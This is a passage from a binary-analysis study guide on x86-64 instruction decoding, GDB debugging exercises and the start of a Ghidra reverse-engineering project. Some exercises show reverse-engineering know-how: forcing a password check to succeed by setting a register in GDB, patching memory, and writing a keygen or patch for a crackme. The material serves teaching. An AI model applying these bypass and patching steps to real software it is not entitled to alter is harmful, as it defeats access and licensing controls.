Key reading: โ€œLow-Level Programmingโ€ Ch. 8 (x86-64 Architecture), Intel SDM Volume 2A Section 2.2.1 (REX Prefixes)

6. Linear vs. Recursive Descent Disassembly

Two strategies: start at the beginning and decode sequentially (linear), or follow control flow (recursive descent).

Guiding questions:

  • What are the advantages of linear disassembly?
  • When does linear disassembly fail? (Hint: inline data)
  • Why is recursive descent more accurate but incomplete?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 6.2 (Disassembly Algorithms)

7. Addressing Modes

x86 has incredibly complex addressing modes: [base + index*scale + displacement].

Guiding questions:

  • How is mov rax, [rbx + rcx*8 + 0x10] encoded?
  • Which addressing modes require a SIB byte?
  • Whatโ€™s RIP-relative addressing? (x64 only)

Key reading: Intel SDM Volume 1 Section 3.7 (Operand Addressing), โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.5.1 (Operand Specifiers)

8. Opcode Extensions and Group Encodings

Some opcodes are โ€œgroupsโ€ where the Reg field of ModR/M selects the actual instruction.

Guiding questions:

  • What is an opcode extension?
  • How do you decode 0xF7 /0 vs 0xF7 /4? (test vs mul)
  • Why does x86 use this complexity?

Key reading: Intel SDM Volume 2 Appendix A (Opcode Map), โ€œPractical Binary Analysisโ€ Ch. 6.2.2

Questions to Guide Your Design

  1. Will you build your own opcode tables or use a library? Capstone is comprehensive, but building tables teaches you deeply. Which path aligns with your goals?

  2. How will you handle invalid or undocumented opcodes? Should you show raw bytes, throw an error, or use heuristics?

  3. What output format will you produce? Intel syntax (mov eax, ebx) or AT&T syntax (movl %ebx, %eax)? Both have audiences.

  4. Will you support only one architecture (x86-64) or multiple? Supporting x86, x86-64, ARM, etc. requires modular design.

  5. How will you display operands? Show registers by name (RAX) or encoding (0x0)? Hex or decimal for immediates?

  6. Whatโ€™s your strategy for multi-byte opcodes? x86 has 1-byte, 2-byte (0x0F), and 3-byte (0x0F 0x38/0x3A) opcodes.

  7. Will you implement linear or recursive descent? Or both as a comparative tool?

  8. How will you handle instruction prefixes? Prefixes modify opcodesโ€”do you show them separately or integrate into the instruction?

Thinking Exercise

Before coding, manually disassemble these byte sequences:

Exercise 1: Simple Instructions Given bytes: 55 48 89 E5 48 83 EC 40

Using Intel SDM:

  1. 55 โ†’ Look up in opcode table โ†’ push rbp (or push ebp in 32-bit)
  2. 48 89 E5 โ†’ REX.W prefix, opcode 0x89, ModR/M 0xE5
    • REX.W โ†’ 64-bit operands
    • 0x89 โ†’ MOV r/m, r
    • ModR/M 0xE5 โ†’ Mod=11 (register), Reg=100 (ESP/RSP), R/M=101 (EBP/RBP)
    • Result: mov rbp, rsp
  3. Continue for remaining bytes

Write out each step. This cements the decode process.

Exercise 2: Memory Operands Bytes: 48 8D 45 C0

Decode:

  1. 48 โ†’ REX.W (64-bit)
  2. 8D โ†’ LEA (Load Effective Address)
  3. 45 C0 โ†’ ModR/M + Displacement
    • ModR/M 0x45 โ†’ Mod=01 (8-bit disp), Reg=000 (RAX), R/M=101 (RBP)
    • Displacement: 0xC0 = -64 (signed byte)
  4. Result: lea rax, [rbp-0x40]

Exercise 3: SIB Byte Usage Bytes: 48 89 8C CD 00 00 00 00

Decode manually:

  1. REX prefix?
  2. Opcode?
  3. ModR/M byte โ†’ triggers SIB?
  4. SIB byte โ†’ Scale, Index, Base?
  5. Displacement?

Expected: Something like mov [rbp+rcx*8], rcx

Exercise 4: Compare Tools

echo -ne '\x55\x48\x89\xe5\x48\x83\xec\x40' > test.bin
objdump -D -b binary -m i386:x86-64 test.bin

Compare your manual work to objdump. Where do they differ? Why?

Also try:

ndisasm -b64 test.bin

Exercise 5: Misalignment Experiment Take a known instruction sequence. Start disassembling from offset+1 instead of offset 0.

What happens? You get nonsenseโ€”this demonstrates why alignment matters and why โ€œdesynchronizationโ€ attacks work on linear disassemblers.

The Interview Questions Theyโ€™ll Ask

  1. โ€œWhatโ€™s the difference between linear and recursive descent disassembly?โ€
    • Linear: Start at entry, decode every byte sequentially. Fast, but fooled by inline data or obfuscation. Recursive descent: Follow control flow (jumps, calls), disassemble only reachable code. Accurate, but misses indirect jumps.
  2. โ€œHow do you handle x86โ€™s variable-length instructions?โ€
    • Parse byte-by-byte: decode prefixes, opcode, ModR/M, SIB, displacement, immediate. Each fieldโ€™s presence depends on previous fields. Requires state machine or careful offset tracking.
  3. โ€œWhatโ€™s the REX prefix and why is it necessary?โ€
    • REX extends x86-64 instructions. REX.W selects 64-bit operands. REX.R, REX.X, REX.B extend ModR/M Reg, SIB Index, and ModR/M R/M fields to access R8-R15 registers.
  4. โ€œExplain ModR/M encoding with an example.โ€
    • ModR/M has 3 fields: Mod (2 bits), Reg (3 bits), R/M (3 bits). Example: mov eax, ebx (0x89 0xD8). 0x89 = MOV r/m, r. 0xD8 = Mod:11, Reg:011 (EBX), R/M:000 (EAX). Result: move EBX to EAX.
  5. โ€œWhen is a SIB byte present?โ€
    • When ModR/M R/M field = 100 (binary) and Mod โ‰  11. SIB allows complex addressing: [base + index*scale + disp].
  6. โ€œHow do you disassemble encrypted or packed code?โ€
    • You canโ€™tโ€”encrypted bytes are meaningless until decrypted. Dynamic analysis: run the code, let it decrypt itself, then dump and disassemble memory.
  7. โ€œWhat are opcode extensions and why do they exist?โ€
    • Some opcodes (like 0xF7) use ModR/M Reg field to select the actual instruction. 0xF7 /0 = TEST, /4 = MUL, /6 = DIV. Saves opcode space.
  8. โ€œHow does x86 differ from ARM for disassembly?โ€
    • ARM has fixed 32-bit (or 16-bit Thumb) instructionsโ€”disassembly is trivial (every 4 bytes is an instruction). x86 is variable-length (1-15 bytes) with prefix hellโ€”disassembly is complex.
  9. โ€œWhatโ€™s the challenge with self-modifying code?โ€
    • Code that changes its own bytes at runtime. Your static disassembly is wrong after modification. Requires dynamic disassembly (disassemble from memory, not file).
  10. โ€œWhy would a malware author use opaque predicates or junk bytes?โ€
    • To break linear disassemblers. Insert jmp label; [garbage bytes]; label:. Linear disassemblers try to decode garbage. Recursive descent skips it.

Books That Will Help

Topic Book Chapter/Section
x86 Instruction Format Intel 64/IA-32 Software Developerโ€™s Manual Vol. 2A Ch. 2: Instruction Format
Instruction Encoding โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch. 3.5: Arithmetic and Logical Operations (encoding examples)
Disassembly Algorithms โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 6.2: Static Disassembly (Linear vs Recursive Descent)
x86-64 Architecture โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 3: Assembly Language, Ch. 8: x86-64
ModR/M and SIB Bytes Intel SDM Volume 2A Section 2.1.3-2.1.5: ModR/M, SIB, and Displacement
REX Prefix Intel SDM Volume 2A Section 2.2.1: REX Prefixes
Opcode Map Intel SDM Volume 2 Appendix A: Opcode Map
Addressing Modes โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.5.1: Operand Specifiers
Assembly Syntax โ€œLow-Level Programmingโ€ Ch. 3.2: Assembly Language Syntax
Disassembly Tools โ€œPractical Binary Analysisโ€ Ch. 5: Basic Binary Analysis in Linux
Instruction Reference Intel SDM Volume 2B-2D Instruction Set Reference (A-Z)
Anti-Disassembly โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 15: Anti-Disassembly
Obfuscation Techniques โ€œPractical Binary Analysisโ€ Ch. 6.2.5: Code Obfuscation
Building Disassemblers โ€œEngineering a Compilerโ€ by Cooper & Torczon Ch. 4: Intermediate Representations (related concepts)

ASCII Diagram: x86-64 Instruction Structure

Maximum instruction length: 15 bytes

+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Prefixes | REX | Opc | ModR/M |  SIB  | Dsp |  Immediate   |  Total    |
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| 0-4 bytes| 0-1 | 1-3 |  0-1   |  0-1  | 0-4 |    0-8       | 1-15 bytes|
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Optional | Opt | Req | Opt    | Opt   | Opt |   Optional   |           |
+----------+-----+-----+--------+-------+-----+--------------+-----------+

Prefixes (0-4 bytes):
  - Lock and Repeat: F0, F2, F3
  - Segment Override: 2E, 36, 3E, 26, 64, 65
  - Operand-size Override: 66
  - Address-size Override: 67

REX Prefix (x64 only, 0-1 byte):
  0100WRXB
    W = 1: 64-bit operand size
    R = extends ModR/M Reg field
    X = extends SIB Index field
    B = extends ModR/M R/M or SIB Base field

Opcode (1-3 bytes):
  - 1-byte: Most common (add, mov, push, pop, etc.)
  - 2-byte: 0x0F escape code + opcode (syscall, movss, etc.)
  - 3-byte: 0x0F 0x38/0x3A + opcode (SSE4, AVX)

ModR/M (0-1 byte): Present for most instructions
  +----+----+----+
  |Mod |Reg |R/M |  (2 bits | 3 bits | 3 bits)
  +----+----+----+
  Mod: Addressing mode
    00 = [R/M]
    01 = [R/M + disp8]
    10 = [R/M + disp32]
    11 = R/M (register direct)
  Reg: Register operand or opcode extension
  R/M: Register or memory operand

SIB (0-1 byte): Present when ModR/M R/M = 100 and Mod โ‰  11
  +-----+-----+------+
  |Scale|Index| Base |  (2 bits | 3 bits | 3 bits)
  +-----+-----+------+
  Encodes: [Base + Index*Scale + Displacement]
  Scale: 1, 2, 4, or 8

Displacement (0-4 bytes):
  - 0 bytes: None
  - 1 byte: disp8 (signed -128 to +127)
  - 4 bytes: disp32 (signed)

Immediate (0-8 bytes):
  - 1, 2, 4, or 8 bytes depending on instruction
  - Constants in mov, add, sub, cmp, etc.

Example Instruction Breakdown: mov rax, [rbp+rcx*8-0x40]

Bytes: 48 8B 44 CD C0

48        = REX.W (64-bit operands)
8B        = Opcode (MOV r64, r/m64)
44        = ModR/M (Mod=01, Reg=000 (RAX), R/M=100 (needs SIB))
CD        = SIB (Scale=11 (8), Index=001 (RCX), Base=101 (RBP))
C0        = Displacement (-0x40 as signed byte)

Decoding:
  - REX.W โ†’ 64-bit operation
  - Opcode 0x8B โ†’ MOV destination, source (r, r/m)
  - ModR/M: Mod=01 (disp8), Reg=000 (RAX), R/M=100 (SIB follows)
  - SIB: Scale=11 (ร—8), Index=001 (RCX), Base=101 (RBP)
  - Displacement: 0xC0 = -64 decimal

Result: mov rax, [rbp + rcx*8 - 0x40]

Key Insight: Disassembly is deterministic at each byte but context-dependent across the stream. Starting from the wrong offset produces garbage. This is why malware uses โ€œdesynchronizationโ€ attacksโ€”embedding unreachable bytes that look like valid instructions to confuse linear disassemblers.

Project 4: GDB Debugging Deep Dive

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for targets), GDB commands
  • Alternative Programming Languages: Python (GDB scripting)
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Debugging / Dynamic Analysis
  • Software or Tool: GDB, pwndbg/GEF, GCC
  • Main Book: โ€œThe Art of Debugging with GDBโ€ by Matloff & Salzman

What youโ€™ll build: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

Why it teaches binary analysis: Debugging is the most direct way to understand program behavior. GDB is the most powerful open-source debugger.

Core challenges youโ€™ll face:

  • Setting breakpoints โ†’ maps to controlling execution
  • Examining memory โ†’ maps to understanding data layout
  • Stepping through code โ†’ maps to following control flow
  • Scripting with Python โ†’ maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Breakpoints and Watchpoints: GDB documentation
  • Memory Examination: โ€œThe Art of Debuggingโ€ Ch. 3
  • Python GDB API: GDB Python documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Basic C, assembly basics

Real world outcome:

$ gdb ./target_binary
(gdb) break main
(gdb) run
(gdb) disassemble
(gdb) info registers
(gdb) x/20x $rsp           # Examine stack
(gdb) x/s 0x402000         # Examine string
(gdb) set $rax = 0x1337    # Modify register
(gdb) python
>>> gdb.execute("info registers")
>>> frame = gdb.selected_frame()
>>> print(frame.read_register("rip"))
>>> end
(gdb) continue

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *0x7ffd1234    # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

  1. Find a hidden password in a crackme
  2. Trace a functionโ€™s execution
  3. Modify a return value to bypass a check
  4. Write a GDB script to log all function calls

Learning milestones:

  1. Basic debugging โ†’ Set breakpoints, step, examine
  2. Memory analysis โ†’ Understand stack and heap layout
  3. Modify execution โ†’ Change registers and memory
  4. Python scripting โ†’ Automate repetitive tasks

The Core Question Youโ€™re Answering

How do you observe and manipulate a running programโ€™s state without modifying its source code, and why is interactive debugging more powerful than static analysis for understanding complex behavior?

Debugging bridges the gap between theory and reality. Static analysis shows what code could do. Dynamic analysis with GDB shows what it actually doesโ€”with real data, real timing, and real state.

Concepts You Must Understand First

1. Process Memory Layout and Address Space

When you debug a program, youโ€™re inspecting its virtual memory: code, data, heap, stack, and libraries.

Guiding questions:

  • Whatโ€™s the difference between the stack and the heap?
  • Why do local variables live at high addresses and code at low addresses?
  • How does GDB access another processโ€™s memory?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 9 (Virtual Memory), โ€œHacking: The Art of Exploitationโ€ Ch. 2 (Programming - Memory Segments)

2. Breakpoints: Software vs. Hardware

Software breakpoints replace instruction bytes with int3 (0xCC on x86). Hardware breakpoints use CPU debug registers.

Guiding questions:

  • How does GDB set a software breakpoint without permanently modifying the binary?
  • What are the limits on hardware breakpoints? (Typically 4 on x86)
  • When would you use a hardware breakpoint instead of software?

Key reading: โ€œThe Art of Debugging with GDB, DDD, and Eclipseโ€ Ch. 2 (Breakpoints), Intel SDM Volume 3 Ch. 17 (Debug Registers)

3. The Call Stack and Stack Frames

The stack grows with each function call. Each frame contains local variables, saved registers, and the return address.

Guiding questions:

  • How does GDBโ€™s backtrace command work?
  • Whatโ€™s stored in the base pointer (RBP) and stack pointer (RSP)?
  • How can you inspect a callerโ€™s variables from a deeper function?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 (Procedures), โ€œHacking: The Art of Exploitationโ€ Ch. 3 (Exploitation - Stack Overflows)

4. Symbols and Debug Information (DWARF)

Stripped binaries have no function names. Binaries compiled with -g contain DWARF debug info mapping addresses to source lines.

Guiding questions:

  • Whatโ€™s the difference between a stripped and non-stripped binary?
  • How does GDB find variable names and types?
  • Can you debug a stripped binary? What do you lose?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 5.3 (Symbols and Stripped Binaries), DWARF Debugging Standard documentation

5. Watchpoints: Breaking on Data, Not Code

Watchpoints trigger when memory is read, written, or changes value. Crucial for finding โ€œwho modified this variable?โ€

Guiding questions:

  • How are watchpoints implemented? (Hint: hardware debug registers)
  • Whatโ€™s the performance cost of watchpoints?
  • Can you watch a range of addresses or only individual locations?

Key reading: โ€œThe Art of Debugging with GDBโ€ Ch. 3 (Watchpoints and Catchpoints), GDB Documentation (Watchpoints section)

6. GDBโ€™s Python API and Automation

GDB embeds Python for scripting. You can automate tasks, write custom commands, and analyze program state programmatically.

Guiding questions:

  • How do you access registers from Python in GDB?
  • Can you set breakpoints from a Python script?
  • How would you log every function call automatically?

Key reading: GDB Python API documentation, โ€œThe Art of Debugging with GDBโ€ Ch. 8 (Scripting)

7. Debugging Multi-Threaded Programs

Threads share memory but have separate stacks and registers. Debugging threads requires understanding concurrency.

Guiding questions:

  • How do you switch between threads in GDB?
  • What happens when one thread hits a breakpointโ€”do others stop?
  • How do you debug race conditions?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 12 (Concurrent Programming), โ€œThe Art of Debugging with GDBโ€ Ch. 6 (Debugging Multi-threaded Programs)

8. Remote Debugging and Embedded Systems

GDB can debug programs on remote systems or embedded devices using the GDB Remote Serial Protocol.

Guiding questions:

  • How does gdbserver communicate with GDB?
  • Can you debug a program on a different architecture?
  • Whatโ€™s the difference between native and remote debugging?

Key reading: GDB Documentation (Remote Debugging), โ€œEmbedded Systems Architectureโ€ by Tammy Noergaard (GDB sections)

Questions to Guide Your Design

  1. What exercises will teach you the most? Simple โ€œhello worldโ€ debugging is boring. What about reversing a password checker? Analyzing a buffer overflow? Tracing a complex data structure?

  2. How will you structure your learning progression? Start with basic commands, then breakpoints, then memory examination, then modification, then Python scripting?

  3. Will you use GDB plugins (pwndbg, GEF, peda)? These add powerful features for exploit development. When should you learn vanilla GDB vs. enhanced versions?

  4. What real-world scenarios will you practice? Debugging a segfault? Finding a memory leak? Analyzing a crackme? Reverse engineering a proprietary binary?

  5. How will you document your GDB knowledge? Build a cheat sheet? Create a reference of common commands? Write GDB scripts you can reuse?

  6. Will you learn GDBโ€™s TUI mode? The Text User Interface shows code, registers, and assembly simultaneously. Itโ€™s powerful but has a learning curve.

  7. What target binaries will you debug? Toy programs you write, existing open-source software, CTF challenges, or malware samples?

  8. How will you practice without source code? Debugging stripped binaries is a critical skill for reverse engineering.

Thinking Exercise

Before writing Python scripts, master these manual exercises:

Exercise 1: Follow a Function Call Chain Compile this with gcc -g:

#include <stdio.h>
int add(int a, int b) { return a + b; }
int calculate(int x) { return add(x, 10); }
int main() {
    int result = calculate(5);
    printf("Result: %d\n", result);
    return 0;
}

In GDB:

  1. Set breakpoint on main
  2. Run and step into calculate (use step, not next)
  3. Step into add
  4. At each frame, use backtrace to see the call stack
  5. Use frame 1 to inspect calculateโ€™s local variables
  6. Use up and down to navigate frames

Exercise 2: Find Where a Variable Changes

int main() {
    int secret = 100;
    secret += 20;
    secret *= 2;
    secret -= 50;
    printf("Secret: %d\n", secret);
}

Use a watchpoint:

  1. Break at first line of main
  2. Run to breakpoint
  3. watch secret (sets watchpoint on the variable)
  4. continue repeatedly, noting when and where secret changes
  5. Examine the assembly at each trigger point

Exercise 3: Modify Execution Flow Compile a password checker:

#include <string.h>
#include <stdio.h>
int check_password(char *pass) {
    return strcmp(pass, "letmein") == 0;
}
int main() {
    char input[50];
    fgets(input, 50, stdin);
    if (check_password(input)) {
        printf("Access granted!\n");
    } else {
        printf("Access denied!\n");
    }
}

In GDB, bypass the check:

  1. Break on the if statement
  2. Examine $rax (return value of check_password)
  3. Use set $rax = 1 to force success
  4. continue and see โ€œAccess grantedโ€ despite wrong password

Exercise 4: Examine Data Structures

struct person {
    char name[20];
    int age;
    float salary;
};

int main() {
    struct person p = {"Alice", 30, 75000.0};
    return 0;
}

In GDB:

  1. Break after struct initialization
  2. print p (shows entire structure)
  3. print p.name
  4. print &p (shows address)
  5. x/20xb &p (examine raw bytes)
  6. ptype p (shows structure definition)

Exercise 5: Reverse Engineering a Stripped Binary Compile without -g and strip:

gcc -O2 -o mystery mystery.c
strip mystery

Now debug it:

  1. gdb mystery
  2. disassemble main (no symbol table, so find entry point)
  3. info files to see entry point
  4. break *0x... (break at address, not function name)
  5. Step through assembly, figuring out what the program does

This is real reverse engineering.

The Interview Questions Theyโ€™ll Ask

  1. โ€œHow does GDB implement software breakpoints?โ€
    • GDB saves the original instruction byte at the breakpoint address, replaces it with int3 (0xCC on x86), and restores it when the breakpoint is removed. When int3 executes, the kernel sends SIGTRAP to the debugger.
  2. โ€œWhatโ€™s the difference between step and next?โ€
    • step (si for assembly) steps into function calls. next (ni) steps over them, treating calls as single instructions.
  3. โ€œHow can you find what caused a segmentation fault?โ€
    • Run the program in GDB. When it crashes, use backtrace to see the call stack, info registers to see register values, and x/i $rip to see the faulting instruction. Often $rsi or $rdi will be 0 (NULL dereference).
  4. โ€œExplain how watchpoints work.โ€
    • Watchpoints use hardware debug registers (DR0-DR3 on x86) to trigger exceptions when memory is accessed. Limited to 4 simultaneous watchpoints. Software watchpoints exist but are very slow (single-step execution).
  5. โ€œHow do you debug a program that immediately crashes?โ€
    • Use starti to break at the very first instruction before main. Or catch syscall exec to break after exec but before startup code.
  6. โ€œWhatโ€™s the purpose of ASLR and how do you handle it in GDB?โ€
    • Address Space Layout Randomization places code/libraries at random addresses for security. GDB can disable ASLR: set disable-randomization on. Useful for consistent breakpoint addresses.
  7. โ€œHow do you debug a running process without restarting it?โ€
    • Use gdb -p <PID> to attach to a running process. GDB sends SIGSTOP, lets you set breakpoints, then you continue.
  8. โ€œWhatโ€™s the difference between a core dump and live debugging?โ€
    • A core dump is a snapshot of memory at crash time. You can debug it with gdb program core, but itโ€™s read-only (no execution). Live debugging lets you run, modify, and restart.
  9. โ€œHow would you automatically log every function call?โ€
    • Write a Python script using GDBโ€™s Python API. Use gdb.events.stop to hook every stop, check if itโ€™s a call instruction, log the function name from symbols or by disassembling.
  10. โ€œWhat information is lost when debugging a stripped binary?โ€
    • Function names, variable names, type information, source line mappings. You only have addresses, raw assembly, and sometimes dynamic symbols (from .dynsym).

Books That Will Help

Topic Book Chapter/Section
GDB Basics โ€œThe Art of Debugging with GDB, DDD, and Eclipseโ€ by Matloff & Salzman Ch. 1-3: GDB Fundamentals
Memory Layout โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch. 9: Virtual Memory
Stack and Calling Conventions โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7: Procedures
Breakpoints Internals โ€œThe Art of Debugging with GDBโ€ Ch. 2: Breakpoints
Watchpoints โ€œThe Art of Debugging with GDBโ€ Ch. 3: Watchpoints and Catchpoints
GDB Python API โ€œThe Art of Debugging with GDBโ€ Ch. 8: Other GDB Topics (Scripting)
Debugging Multi-threaded Programs โ€œThe Art of Debugging with GDBโ€ Ch. 6: Debugging Multi-threaded Programs
Symbols and DWARF โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 5.3: Symbols and Stripped Binaries
Dynamic Analysis โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 3: Basic Dynamic Analysis
Reverse Engineering with GDB โ€œPractical Binary Analysisโ€ Ch. 5: Basic Binary Analysis in Linux
Exploitation and GDB โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 3: Exploitation (Using GDB)
Stack Smashing โ€œHacking: The Art of Exploitationโ€ Ch. 3.3: Stack-Based Buffer Overflows
CPU Debug Registers Intel 64/IA-32 SDM Volume 3 Ch. 17: Debug, Branch Profile, TSC, and Quality of Service
Remote Debugging GDB Documentation (official) Remote Debugging section
Core Dumps โ€œThe Art of Debugging with GDBโ€ Ch. 4: Core Files

ASCII Diagram: GDB Process Interaction

+----------------------+          ptrace() system call          +--------------------+
|                      | <------------------------------------- |                    |
|   Target Process     |                                        |    GDB Debugger    |
|   (Your Program)     | --------------------------------------> |    (Controller)    |
|                      |          Memory read/write             |                    |
+----------------------+          Register access               +--------------------+
         |                        Set breakpoints                        |
         |                                                                |
         |                                                                |
         v                                                                v
+-------------------+                                            +-----------------+
| Virtual Memory    |                                            | GDB Commands    |
| +---------------+ |                                            | - break         |
| | Stack         | |  <-- GDB can read/write                    | - run           |
| | (local vars)  | |      any of this memory                    | - step/next     |
| +---------------+ |                                            | - print         |
| | Heap          | |                                            | - x (examine)   |
| | (malloc'd)    | |                                            | - set           |
| +---------------+ |                                            | - backtrace     |
| | .data         | |                                            | - disassemble   |
| | (globals)     | |                                            +-----------------+
| +---------------+ |
| | .text         | |
| | (code)        | |  <-- Software breakpoint: int3 (0xCC)
| | ...           | |      Hardware breakpoint: DR0-DR3 registers
| | 0x401000: RET | |
| +---------------+ |
+-------------------+

Breakpoint Mechanism:
  Original: 0x401000: 55        (push rbp)
  GDB sets: 0x401000: CC        (int3 trap instruction)
  When hit: Kernel sends SIGTRAP to GDB
  GDB:      Restores original byte (55)
            Shows user the breakpoint hit
            User can inspect/modify state
  Continue: Executes real instruction (55)
            Re-inserts breakpoint (CC) if persistent

GDB Command Categories

Execution Control:
  run (r)              - Start program
  continue (c)         - Resume execution
  step (s)             - Step into (source line)
  stepi (si)           - Step into (instruction)
  next (n)             - Step over (source line)
  nexti (ni)           - Step over (instruction)
  finish               - Run until function returns
  until <location>     - Run until location

Breakpoints:
  break <where>        - Set breakpoint
    break main
    break *0x401000
    break file.c:42
  watch <expr>         - Break on write
  rwatch <expr>        - Break on read
  awatch <expr>        - Break on access
  catch <event>        - Break on event
    catch syscall write
  info breakpoints     - List all breakpoints
  delete <n>           - Delete breakpoint

Examination:
  print <expr>         - Print value
    print $rax
    print myvar
    print/x $rsp      (hex format)
  x/<n><f><u> <addr>   - Examine memory
    x/10i $rip        (10 instructions)
    x/20xw $rsp       (20 words in hex)
    x/s 0x402000      (string)
  info registers       - Show all registers
  info frame           - Current stack frame
  backtrace (bt)       - Call stack
  disassemble <where>  - Show assembly

Modification:
  set <var> = <value>  - Change variable
    set $rax = 0
    set myvar = 100
    set *(int*)0x401000 = 0x90909090

Process Info:
  info proc mappings   - Memory map
  info sharedlibrary   - Loaded libraries
  info threads         - List threads
  thread <n>           - Switch to thread

Python Scripting:
  python <code>        - Execute Python
  python-interactive   - Python REPL
  source script.py     - Run script

Key Insight: GDB isnโ€™t just for finding bugsโ€”itโ€™s a reverse engineering Swiss Army knife. Combined with scripting, you can automate complex analysis: trace all heap allocations, log every comparison against a password, or build a complete call graph. Master GDB and you unlock the ability to understand any binary.

Project 5: Ghidra Reverse Engineering

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Java (for scripts), Ghidra
  • Alternative Programming Languages: Python (Ghidrathon)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 2. The โ€œMicro-SaaS / Pro Toolโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Decompilation
  • Software or Tool: Ghidra (NSA), sample binaries
  • Main Book: โ€œGhidra Software Reverse Engineering for Beginnersโ€

What youโ€™ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is the industry-standard free tool. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges youโ€™ll face:

  • Navigating Ghidraโ€™s UI โ†’ maps to efficient workflow
  • Using the decompiler โ†’ maps to understanding control flow
  • Cross-references โ†’ maps to finding function usage
  • Writing scripts โ†’ maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Code Browser: Ghidra documentation
  • Decompiler Window: โ€œGhidra RE for Beginnersโ€ Ch. 4
  • Ghidra Scripting: Ghidra API documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4, solid assembly knowledge

Real world outcome:

Analyzing a CTF crackme in Ghidra:

1. Load binary โ†’ Auto-analysis runs
2. Find main() โ†’ Entry point analysis
3. Decompile main() โ†’ See C-like code:

   int main(int argc, char **argv) {
       char input[32];
       printf("Enter password: ");
       scanf("%s", input);
       if (check_password(input)) {
           printf("Correct!\n");
       } else {
           printf("Wrong!\n");
       }
       return 0;
   }

4. Analyze check_password() โ†’ Find algorithm
5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

  1. Create project โ†’ Import binary
  2. Let auto-analysis complete
  3. Navigate with โ€˜Gโ€™ (goto address) or symbol tree
  4. Use โ€˜Lโ€™ to rename functions/variables
  5. Use โ€˜;โ€™ to add comments
  6. Use โ€˜Xโ€™ to find cross-references

Scripting example (Ghidra Python):

# Find all calls to dangerous functions
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            print(f"Call to {func_name} at {ref.getFromAddress()}")

Learning milestones:

  1. Navigate efficiently โ†’ Find functions, strings, imports
  2. Understand decompiler output โ†’ Read C-like code
  3. Rename and annotate โ†’ Make code understandable
  4. Write scripts โ†’ Automate repetitive analysis

The Core Question Youโ€™re Answering

How do you transform an opaque binary blob into understandable, analyzable code without access to source, and how can you automate this process at scale?

This project teaches you to bridge the gap between raw machine code and high-level logic using industry-standard tooling. Youโ€™ll learn not just to read binaries, but to make them readable for others.

Concepts You Must Understand First

1. Intermediate Representations (IR)

An IR is a translation layer between machine code and high-level code. Ghidra uses โ€œP-Codeโ€ as its IR, which normalizes different CPU architectures into a common format.

Guiding Questions:

  • Why canโ€™t decompilers directly translate assembly to C without an intermediate step?
  • How does P-Code handle architecture-specific quirks (endianness, calling conventions)?
  • What information is lost when converting from assembly to IR?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 6 - Binary Analysis Fundamentals

2. Control Flow Graphs (CFG)

CFGs represent program execution paths as nodes (basic blocks) and edges (jumps/branches). Ghidra automatically builds CFGs to understand program structure.

Guiding Questions:

  • What defines a basic block boundary (entry/exit points)?
  • How do conditional branches create multiple paths in a CFG?
  • Why are CFGs essential for decompilation quality?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 7 - Simple Code Injection

3. Data Flow Analysis

Understanding how data moves through a programโ€”from parameters through operations to return valuesโ€”is key to renaming variables meaningfully.

Guiding Questions:

  • How do you track a value from function entry to its use in a comparison?
  • Whatโ€™s the difference between reaching definitions and use-def chains?
  • How does stack frame analysis help identify local variables vs parameters?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 - Procedures

4. Type Inference

Decompilers guess variable types from their usage (pointer arithmetic, function calls, comparisons). Understanding this helps you correct wrong guesses.

Guiding Questions:

  • How does Ghidra infer that mov rax, [rbx] suggests rbx is a pointer?
  • What clues indicate a variable is a string vs a byte array?
  • When do you need to manually fix type annotations?

